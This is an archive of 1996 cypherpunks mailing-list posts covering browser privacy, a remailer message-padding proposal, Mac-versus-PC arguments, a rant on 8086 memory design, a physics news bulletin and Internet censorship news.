Subject: [Off-topic] Re: Insults (was: PBS show)
In-Reply-To: <Pine.3.89.9606140305.A10802-0100000@netcom19>
Message-ID: <9606141706.aa16535@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.3.89.9606140305.A10802-0100000@netcom19>, jonathon writes:
>	Note in passing that both "Baptist" and "Mormon" were 
>	originally terms of insult heaped on members of those
>	respective faiths.  

	I think "Quaker" had a similar history..

	Derek Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sat, 15 Jun 1996 13:15:26 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: doubleclick monitoring web browsing habits
In-Reply-To: <199606141818.OAA27290@unix.asb.com>
Message-ID: <m2lohpykl2.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Deranged" == Deranged Mutant <WlkngOwl@unix.asb.com> writes:

Deranged> On 13 Jun 96 at 16:19, Hal wrote:

>> refrained from telling my Netscape browser my name and email
>> address out of fear that it would reveal this information; as a
>> result, I can't use mailto: links, which is annoying (and also
>> suspicious; lynx allows me to do mailto: without permanently
>> entering an email address).

Deranged> Lynx running under Unix can find out who you are on the
Deranged> system by checking your user id and the hostname.

So what?  So can any program you run, and so can Lynx running under
VMS.  The Good Thing about Lynx is that it refuses to put any personal
information in mail sent via mailto: unless you explicitly tell it to
do so.  I like this feature.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sat, 15 Jun 1996 13:13:32 +0800
To: jim bell <jimbell@sybase.com>
Subject: Re: PBS show
Message-ID: <9606150041.AA11251@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain



143K.  Per side.

   Ryan

---------- Previous Message ----------

The original Apple II floppy held ONLY 90 kilobytes on a 5" floppy.  How did 
they do such a bad job?









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 15 Jun 1996 17:08:09 +0800
To: cypherpunks@toad.com
Subject: Re: doubleclick monitoring web browsing habits
In-Reply-To: <199606132319.QAA14901@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960614175916.153A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 13 Jun 1996, Hal wrote:

> One question is whether enough information to uniquely identify users
> is routinely provided by widely used browsers like Netscape.  I have
> refrained from telling my Netscape browser my name and email address out
> of fear that it would reveal this information; as a result, I can't use
> mailto: links, which is annoying (and also suspicious; lynx allows me to
> do mailto: without permanently entering an email address).

I do this too.  Until recently, it was trivial for a server to either force
the browser to download something via FTP and record the e-mail address or use
the infamous Javascript hack.  I currently have Netscape setup to disable Java,
and issue warnings whenever sending a form via e-mail or accepting a cookie.
I think this will prevent my e-mail address from being revealed to any server,
but it is not enough to satisfy my paranoia.  I would be truely satisfied if
Netscape would prompt for an e-mail address whenever it sends mail or post to
usenet.

> 
> This points out the need for browser providers to be sensitive to the
> privacy needs of their users and to clearly explain when and under what
> circumstances private information is revealed.  It also suggests that
> services like www.anonymizer.com will be increasingly important for
> people to protect their privacy while browsing.

Definitely.  Although they will never be as secure as anonymous remailers
(messages can not be delayed), this will be much better protection against
information gatherers.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMcHiaLZc+sv5siulAQF6DwQAqjNIai5zPDqCUxyCq2Y9BuM7EjUjp7IF
7GhSalQAilThBB+v4N6cQ6glkGOE+9heGBqsob0HKdQdIP2/AdbVCCgobO5JRGy+
kUPpMBve51PWjBu+ey85AlcJIwi0d8Upkb8aC4HYf79UTfzkOd2/84eBY0F5iY4X
iuoTsUwcFt4=
=RfVo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 12:19:25 +0800
To: "Josh Sled" <tcmay@got.net>
Subject: Re: PBS show
Message-ID: <m0uUh4J-00035iC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 PM 6/14/96, Josh Sled wrote:
>On Thu, 13 Jun 96 23:23 EDT, Blake Wehlage wrote:
>
>>Mac rule they have an awesome GUI (graphical user interface), easy of use it
>>way up there and they have bitchin' software. 
>>
>>I know i will regret saying this but:
>>
>>The mac OS is 3 times better than Windows '95 
>
>Though I agree with you, and I think OS/2's WorkPlace Shell and
>Presentation Manager is about 10 times better than MacOS, this isn't
>the place for GUI or OS holy wars...
>
>ObCrypto: Incorporating crpyto into a GUI : strong crypto (RSA, 3DES)
>represented as strong locking devices (safe, vault, etc), weak crypto
>represented as weak devices (padlock, chain-link)... what do you think?
>
>Joshy
>
>
>
>
Oh my God someone agrees with me I see the light at the end of the tunnel,
in this window covered world. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 13:03:52 +0800
To: "David E. Smith" <dsmith@prairienet.org>
Subject: Re: PBS show
Message-ID: <m0uUh4G-00035gC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:24 PM 6/14/96 -0500, David E. Smith wrote:
>>I know i will regret saying this but:
>>
>>The mac OS is 3 times better than Windows '95 
>>
>
>Gee, what's three times zero?
>
>dave
>
>
>
>
48? you can thank the public education system for that answer. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Sat, 15 Jun 1996 14:51:41 +0800
To: cypherpunks@toad.com
Subject: Is the list down?
Message-ID: <199606150021.TAA28779@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 15 Jun 1996 15:23:27 +0800
To: printing@explicit.com
Subject: Re: Mission Anonymous / U.S. News & World Report
In-Reply-To: <m0uUU6j-000rQEC@maki.wwa.com>
Message-ID: <199606150227.TAA00580@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Thank you.

> 
> June 17, 1996 U.S. News & World Report 
> Newswatch,  Page 76
> 
> Mission Anonymous
> 
> Very good write up on Community ConneXion's Anonymizer,
> and on new features offered at the Center for Democracy and 
> Technology.  
> 
> William Knowles
> Graphically Explicit
> 
> //!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
>   Graphically Explicit                     
>   Printing - Advertising - Interactive  
>   1555 Sherman Avenue - Suite 203          
>   Evanston IL., 60201-4421                 
>   800.570.0471 - printing@explicit.com
>   Accept, Embrace, Adapt, Create     
> \\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//
> 


-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>someone@someplace.not.far.from.you
Date: Sat, 15 Jun 1996 17:03:55 +0800
To: cypherpunks@toad.com
Subject: Hackerpunks and C2
Message-ID: <199606150405.VAA08966@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Ecafe Mixmaster Remailer wrote:
> The proposal for a Hackerpunks nym based mailing list is interesting,
> however, there are some concerns regarding the susceptibility of the list
> to traffic analysis.

I think that the belief of the owner of hackerpunks that s/he won't
be discovered is somewhat naive. Even though your traffic analysis
ideas are right (see below), the most likely way to discover the owner is
his/her unintentional screwup. I just feel like monitoring traffic of 
all internet is too expensive.

Still, the secrecy of the location of the hackerpunks-owner is not such
an important thing (as long as the list is not located in some police
state not honoring free speech). The knowledge of said localtion is 
not even really important since the contents of this list may be
montored anyway by simply subscribing to the list.

> The solution to the two dilemmas seems to be to ask that the C2 re-mailing
> code be modified so as ensure that each messages is padded to a fixed size
> before encrypting and being sent through the reply block. On the other
> hand, this would give away information that anyone receiving messages of
> this fixed length was likely the owner of some C2 nym.

[maybe I saw it on this list] How about this: that every remailer adds
a cookie of size X where

      S == size( message )
      X == 20KB - S + rand( 40KB ) if S < 20KB
      X == 40KB - S + rand( 80KB ) if 20KB <= S < 40KB
      X == 80KB - S + rand( 160KB ) if 40KB <= S < 80KB

and so on. This way, only 2-3 bits of information about size will
be available to traffic analyzers, instead of about 10-12. For the
most typical situation of messages being about 5KB in size, there
is no information leaking.

Of course, if an incoming message contained a cookie, it should be 
dropped by the remailer to be replaced by the new one on the next hop.

Same cookie feature could be added to premail.

Have fun.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 15 Jun 1996 15:38:13 +0800
To: cypherpunks@toad.com
Subject: update.275 (fwd)
Message-ID: <199606150224.VAA07948@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From physnews@aip.org Fri Jun 14 18:39:08 1996
Date: Fri, 14 Jun 96 16:45:16 EDT
From: physnews@aip.org (AIP listserver)
Message-Id: <9606142045.AA11832@aip.org>
To: physnews-mailing@aip.org
Subject: update.275


PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 275  June 14, 1996    by Phillip F. Schewe and Ben Stein

THE FIRST QUANTUM COMMUNICATION USES "TRITS"
INSTEAD OF BITS.  For the first time, physicists have exploited
the laws of quantum mechanics to send data, and with their
technique have conveyed information more efficiently than with
traditional means.     In contrast to a traditional computer, in which
messages consist of tiny electric pulses encoded in binary form
(i.e., streams of 0s and 1s), researchers at the University of
Innsbruck in Austria send messages consisting of single photons
which can be coded as 0s, 1s, and 2s, setting up a base three system
called "trits."  The Innsbruck group (Harald Weinfurter,
harald.weinfurter@uibk.ac.at) converts a single ultraviolet photon
into two photons whose properties are quantum mechanically
interlinked, or "entangled."  Devices then encode a 0, 1, or 2 onto
one of the photons by performing an operation on it (such as
flipping its spin or shifting its phase); since the devices are blind to
the initial state of the photon, they change the overall properties of
the entangled photon pair without determining its final state.  The
two photons are recombined and then the interlinked pair travels
towards a network of detectors.  Two-photon interference creates
three different sets of detection possibilities in the Innsbruck setup
that reveal the quantum state of the entangled pair and whether the
photon was encoded with a  0, 1, or 2.  The physics of
entanglement has been exploited in numerous recent experiments,
to build quantum logic gates (Update 250) and perform an atom-level demonstration of Schrodinger's cat (Update 273), but until
now it has never been used for quantum communication---encoding
a message at one location and receiving it at another. Furthermore,
the same information contained in a typical ASCII character,
normally requiring the use of 8 bits, can also be transmitted using
only 5 trits.  (K. Mattle et al, Physical Review Letters, 17 June
1996.  More information and graphics can be found at
http://www.uibk.ac.at/c/c7/c704/qo/photon/_qdc)

THE CLOSEST EXTRA-SOLAR PLANET yet discovered orbits
the star Lalande 21185, only 8.1 light years from Earth.  George
Gatewood of the University of Pittsburgh observed a telltale wobble
in the light coming from the star, indicating the presence of a
Jupiter-sized planet circling the star in a Saturn-sized orbit. 
Gatewood's data, presented at the meeting of the American
Astronomical Society in Madison, WI, even hinted at the possibility
of other planets in the same solar system. (Washington Post, 12
June.)  Also,  another planet has been found by Geoff Marcy of San
Francisco State and Paul Butler of Berkeley, who announced two
new planets in January 1996.  Their new find is a Jupiter-sized
planet orbiting the star Rho Cancri (40 light years from Earth) at a
distance of only 0.1 astronomical units.  It completes a "year" in
only about two Earth weeks.  (Sky & Telescope, July 1996)

A MOVIE OF THE CRAB NEBULA provides new details about
pulsar dynamics.  At the heart of the nebula is a pulsar (the remnant
of a 1000-year-old supernova) which casts powerful streams of
particles into the surrounding debris-filled medium.  The Hubble
Space Telescope has recorded a sequence of pictures which show
where much of the pulsar's energy goes.  One surprise was how
quickly the landscape alters: noticeable changes in the region around
the pulsar sometimes occurred in a matter of days.  A second
surprise is that the outward flow of energy is confined largely to
two zones: jets shooting out from the poles and wisps of material in
the pulsar's equatorial plane.  (Science News, 8 June; Science, 7
June.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 15 Jun 1996 17:25:25 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] (was Re: PBS show)
Message-ID: <199606150431.VAA02619@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:38 AM 6/14/96 -0700, anonymous-remailer@shell.portal.com wrote:
>at Thu, 13 Jun 1996 11:30:44 -0800 jim bell <jimbell@pacifier.com> may have 
written...
>
>>Brain-dead segmented architecture, 64k per segment limitation
>code segments, ever hear of code segments?  Data segments maybe? 

There is nothing wrong, conceptually, with _software_ segments...  In fact, 
even hardware segmentation is okay _IF_ the maximum size of those segments 
will NEVER (in the computer architecture's entire lifetime, and that 
includes later compatible CPU's) be challenged by the largest program and 
data to be run on that machine.  But a 64K byte segment size is truly and 
astoundingly bad design, even for 1976.  Even a 2**24 byte (16 megabytes) 
segment size would have turned into a wall a few years ago.  A 2**32 byte (4 
gigabyte) limit would not be a problem for at least 10 more years.

> Ever actually do any 8086 assembler? 

A minimal amount, fortunately.  Liked 8080 and Z-80 far better.  (Not that I 
think their limited address space is "better," merely that their design 
matched their intended uses far better.)


> You would have liked them.  In fact,
>even the MAC's O/S had them built in as I recall, just not a hardware
>limitation with the 68000.  A good programmer was not limited by these.
>
>>1-megabyte memory limitation.  The only thing that made it 
>OK, I concede here... But if you actually write code instead
>of pasting code together, 1MB is plenty of RAM with this
>processor.

It's still a problem.   I just ran Microsoft Windows Anti-virus a few days 
ago, on a 1.6 gigabyte hard drive, and it said I was "out of conventional 
RAM."  (Not because of "too much code," but because of too much data.)  With 
16 megabytes of DRAM, total, that's a laugh!  Try explaining this problem to 
a person who doesn't understand the distinction between "conventional" and 
extended memory.  They will have no idea that a stupid design decision made 
in 1976 caused a problem in 1996.

Most people don't understand the WHY behind that idiotic 1 megabyte 
limitation, and how it could so easily have been fixed.  As I understand it, 
when they were designing the 8086 the maximum-size package that Intel dealt 
with was a 40-pin ceramic package.  Well, look at the pinout of an 8086 and 
you'll see the problem:  Even with address/data multiplexing, you simply 
can't get more than 20 address bits out of a 40-pin package and keep the 
necessary control and power lines.  That's a limitation, and that's bad, but 
it turns out they made a bad design worse.

The best fix would have been to get a 44 or 48 pin package,(as, for example, 
the Z-8000 did) and dedicate at least 4 more bits to the address, which 
would have been a limitation of 16 megabytes, or 8 more, which would have 
been 256 megabytes.   But the Intel packaging people were apparently given a 
veto on the whole thing, and they stayed with a 40-pin package.  

But here's how they made it worse:  In the 8086 architecture, there are two 
16-bit registers added together (with a 4-bit offset) to form a 20-bit 
address.  Even if the designers were forced to accept that the initial 
implementation of the 8086 would only have a 40-pin package, at the very 
least they could have changed the segment offset to 8 bits or even 12 bits, 
which would have formed a 24 or 28-bit address internal to the 8086, of 
which only the lower 20 bits could be available.  Any computers built with 
this specific chip would be limited to a physical 1-megabyte memory space, 
HOWEVER future implementations of this architecture (for instance, the 
equivalent of the  80286) would have more address lines.  More RAM could be 
installed in them.  

So far, that sounds just like the 80286, right?  Wrong.  (The '286 can only 
access memory space above 1 megabyte by shifting to "protected mode," which 
is incompatible with DOS.)  Unlike the way it actually was with the 8086 vs. 
the 80286, the software would be compatible, because the segment addressing 
would have been identical, and their would no longer be any sort of physical 
1-meg limitation remaining.  In other words, there would be no residual 
conventional memory limitation, and "we'd all live happily ever after."  
(True, programmers would eventually write programs which exceed the memory 
capacity of the 8086, but that would not have affected newer computers.)

Somehow, I think if you could corner one of the 8086 designers, ideally with 
a 12-gauge shotgun, he'd say, "Doh!  We didn't think of that!"  That's 
right, they didn't think of that, because they _JUST_DIDN'T_THINK!_
And over 200 _BILLION_ dollars of money has been spent on computers limited 
by a brain-damaged architecture, when they could just as easily have avoided 
the problem back in 1976 with a trivial fix.
  
The one conceivable defense that Intel could muster would be, "We didn't 
anticipate this.  We didn't intend for the 8086 to be used as a 
general-purpose computer."  True or not in 1976, that defense was not 
available to IBM in 1980:  They were fully aware of the problem, and they 
knew about the 68000, and yet they chose the 8088 anyway.  The same 
short-sighted pig-headedness that would later be demonstrated by Bill Gates 
when he said something like "Nobody will ever need more than 640 kilobytes 
of RAM" was shown by Intel people in the middle 1970's.


>  What was brain dead was the fact that IBM in it's
>infinite wisdom "stole" near half of that for it's poor hardware
>designs (640k-1MB range).

IBM did add to the problem, true, but they "only" cut down the address space 
to 640 from 1 megabyte. Even 1 megabytes would have been an intolerable limitation.   Had 
Intel allowed a logical address space of 256 megabytes or even 16 megabytes, 
the loss of 380 kilobytes would not have been particularly limiting.  
Believe me, I'm not defending IBM, they're both guilty of gross stupidity.

>Joseph L. (Joe) Moll, Greenville, SC  USA  mailto:oolid@acqic.org

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sat, 15 Jun 1996 18:57:39 +0800
To: cypherpunks@toad.com
Subject: Re: Comments on MicroPayments and the Web
Message-ID: <2.2.32.19960615052947.006d85cc@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:22 PM 6/13/96 -0700, Hal wrote:

>Consider two sites, one which acts as a proxy and cache but which
>charges something under a penny per page, and another which acts for
>free.  Won't the for-pay site be able to afford a larger disk, more
>servers, and better net connections?  It will be a superior service.

Just like commercial crypto, servers, news clients, and the like are all
superior to the free versions?

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sat, 15 Jun 1996 15:36:21 +0800
To: cypherpunks@toad.com
Subject: WEB: Child molester database
Message-ID: <199606150240.WAA06155@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text



Along with the arms trafficker page, now we have a "child molester
database":

http://www.greatworld.com/public

Deadbeat Dads, Drug Dealers and more, coming soon according to blurb.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch."  -US Postal
spokeswoman, quoted in AP, 1/27/96. I don't know about you, but most people I
know who saw someone in uniform on their porch would pull out the shotgun...
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 15 Jun 1996 16:03:41 +0800
To: markm@voicenet.com>
Subject: Re: Does information want to be free?
In-Reply-To: <Pine.LNX.3.93.960614164556.394A-100000@gak>
Message-ID: <4lkW=Qu00YUyN3a9sM@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 14-Jun-96 Does information want to
be.. by "Mark M."@voicenet.com 
> For those interested, there is an article in the latest Scientific American
> about copyright laws and how they will be applied to the Internet.  It used
> the banned French book about the former president as an example of just how
> difficult it is to regulate information.  It also addresses whether routers
> (or analogously anonymous remailers) should be held liable for any copyright
> violations that may pass through them.

ObPlug: _Le Grand Secret_ is at <http://www.cs.cmu.edu/~declan/le-secret/>.

Last month I inteviewed a French government official in conjunction with
an article I was writing. I confess I was amused by how he described
those Internet anarchists who delighted in publicizing books that should
in fact be restricted.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 15 Jun 1996 19:43:12 +0800
To: cypherpunks@toad.com
Subject: Here we go again
Message-ID: <v01540b05ade814d49805@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Copyright 1996 Nando.net
Copyright 1996 The Associated Press

SEOUL, South Korea (Jun 15, 1996 00:41 a.m. EDT) -- For a Canadian
university student, creating an Internet site on North Korea was simply
opening a small library on the  reclusive nation. For South Korean
authorities, it was threat to national security.

Last week, South Korea declared David Burgess' World Wide Web site
subversive and ordered 14 local computer networks with Internet links to
block public access to it.

The government also said it would punish anyone accessing North Korean web
sites, taking its ideological war with its Marxist enemy into cyberspace.


-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wxfield@shore.net (Warren)
Date: Sat, 15 Jun 1996 16:10:40 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <v02140701ade7dc4ec6d4@[204.167.110.224]>
MIME-Version: 1.0
Content-Type: text/plain


Blake;

        I agree with you...(re:Apple II was a toy)...

        <smirk>
        Eniac, by comparison was also a toy...(I wonder how many lives it
saved???)


        Heck, Eniac has it 'all over' the Abacus - Gosh, those darn
Babylonians seem so primitive nowadays!



>At 11:23 PM 6/13/96 EDT, Blake Wehlage wrote:
>>At 09:35 AM 6/13/96 -0800, jim bell wrote:
>
>>>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset
>>>key, upper-case only, 40-character wide display, odd microprocessor, VERY
>>>SMALL capacity floppies (which were very slow as well), as well as a hostile
>>>legal situation regarding the building of clones.  Hell, they even objected
>>>to other companies building boards which plugged into the bus!
>>
>>
>>I was not a toy it was what started the PC revolution
>
>Grandly ignoring the Altair, the TRS-80 Model I, the IMSAI, et al.  Even Jolt!
>
>
>Jim Bell
>jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wxfield@shore.net (Warren)
Date: Sat, 15 Jun 1996 16:25:44 +0800
To: cypherpunks@toad.com
Subject: Fuseable Links - no guarantees??
Message-ID: <v02140702ade7e09bc9e6@[204.167.110.224]>
MIME-Version: 1.0
Content-Type: text/plain


I have never paid much attention to the protection of firmware or the
technical issues revolving around such schemes...was wondering:

I recently saw an add for a UK based group that says they can take a PIC
OTP micro and read the prom (for a fee, of course) - How the heck is this
done?? I have my suspicion that they (somehow) magically peel off the
ceramic coating (without destroying the chewy center), get a circuit mask
and 'micro probe' the I/O of the IC...they then download the secret recipe
to the afore mentioned 'chewy center'.

Is this close to accurate?? How is it 'done' ???


                                                                -Just Curious






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sat, 15 Jun 1996 16:34:45 +0800
To: tcmay@got.net
Subject: Re: PBS show
Message-ID: <960615000434_556692955@emout13.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-14 23:48:14 EDT, jwilk@iglou.com (Blake Wehlage)
writes:

<< At 12:51 PM 6/14/96, Josh Sled wrote:
 >On Thu, 13 Jun 96 23:23 EDT, Blake Wehlage wrote:
 >
 >>Mac rule they have an awesome GUI (graphical user interface), easy of use
it
 >>way up there and they have bitchin' software. 
 >>
 >>I know i will regret saying this but:
 >>
 >>The mac OS is 3 times better than Windows '95 
 >
 >Though I agree with you, and I think OS/2's WorkPlace Shell and
 >Presentation Manager is about 10 times better than MacOS, this isn't
 >the place for GUI or OS holy wars...
 >
 >ObCrypto: Incorporating crpyto into a GUI : strong crypto (RSA, 3DES)
 >represented as strong locking devices (safe, vault, etc), weak crypto
 >represented as weak devices (padlock, chain-link)... what do you think?
 >
 >Joshy
 >
 >
 >
 >
 Oh my God someone agrees with me I see the light at the end of the tunnel,
 in this window covered world.  >>
WELllllll Id hate to say.... but after coming across A LOT of different users
from both systems.. It has seemed to me that... IN GENERAL, Mac users are
more computer 'illiterate' seeing as the mac's ease of use. Fine for the
everyday person... but not for me. 
Secondly.....as far os the computers software are concerned...... Not much
beats winNT => windows=> PC
THe chips arent 'too' much different. and that leaves me to say..... There's
more PC's out there... which seeing as whats presented..... Leads me to
thinks PC's are 'better' in my eyes.
So... how baout those mets?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 16:56:27 +0800
To: Derek Bell <grafolog@netcom.com>
Subject: Re: [Off-topic] Re: Insults (was: PBS show)
Message-ID: <m0uUmgt-00035UC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 PM 6/14/96 +0100, Derek Bell wrote:
>In message <Pine.3.89.9606140305.A10802-0100000@netcom19>, jonathon writes:
>>	Note in passing that both "Baptist" and "Mormon" were 
>>	originally terms of insult heaped on members of those
>>	respective faiths.  
>
>	I think "Quaker" had a similar history..
>
>	Derek Bell
>
>
>
I think "hacker, cyberpunk, and phone phreak" are want people think are
insults but me and my friends take them a unthought out complaments. 

P.s. who ever sent me mail calling me pokey should stop hiding behind a
remailer, and show yourself, you coward. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 17:20:41 +0800
To: tcmay@got.net
Subject: Re: PBS show
Message-ID: <m0uUmsb-00035iC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain




>WELllllll Id hate to say.... but after coming across A LOT of different users
>from both systems.. It has seemed to me that... IN GENERAL, Mac users are
>more computer 'illiterate' seeing as the mac's ease of use. Fine for the
>everyday person... but not for me. 
>Secondly.....as far os the computers software are concerned...... Not much
>beats winNT => windows=> PC
>THe chips arent 'too' much different. and that leaves me to say..... There's
>more PC's out there... which seeing as whats presented..... Leads me to
>thinks PC's are 'better' in my eyes.
>So... how baout those mets?
>
>
Well I am now using a PC, I use a MAc for programming and both for
networking& the internet. So as usual I am plastered as a 13 year old
"computer illiterate" thanks real big confidence booster. I love my pc & my
mac, I also love my Apple II it showed me the way of programming (first with
basic), now I program in C and C++. Oh yea I guess I'm still computer
illiterate. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sat, 15 Jun 1996 17:12:59 +0800
To: tcmay@got.net
Subject: Re: PBS show
Message-ID: <960615003243_556707180@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-15 00:22:48 EDT, jwilk@iglou.com (Blake Wehlage)
writes:

<< Well I am now using a PC, I use a MAc for programming and both for
 networking& the internet. So as usual I am plastered as a 13 year old
 "computer illiterate" thanks real big confidence booster. I love my pc & my
 mac, I also love my Apple II it showed me the way of programming (first with
 basic), now I program in C and C++. Oh yea I guess I'm still computer
 illiterate.  >>
Id hate to say it.... But i KNOWW you read the part in my letter about it
being a GENERAL statement.. i seem to recall I put general in all caps too.
Or do those apple 2's only work in all caps... Didnt use those. I used my old
atari 800xl to learn basic back in OOooooo 3rd grade. Damn.. Long time
ago..........
Back to some encryption things.............I have something I need to look up
a little. more..... but Im interested on starting a decryption of a string.
It was encrypted using a password, and a randomly seeded number thats
reseeded for every character in the string i beliveve... let me research it
again... and Ill post some more....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 17:15:03 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <m0uUn5P-00035gC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 6/13/96 -0800, jim bell wrote:

>
>I only watched a few minutes of the show.  Did they mention that Microsoft 
>actually bought the MSDOS operating system from Seattle Computer products?
>
They mentioned it, also to be correct the original name was QDOS (quick &
dirty Operating System). 
>
>Literally!
>
>
>Jim Bell
>jimbell@pacifier.com
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
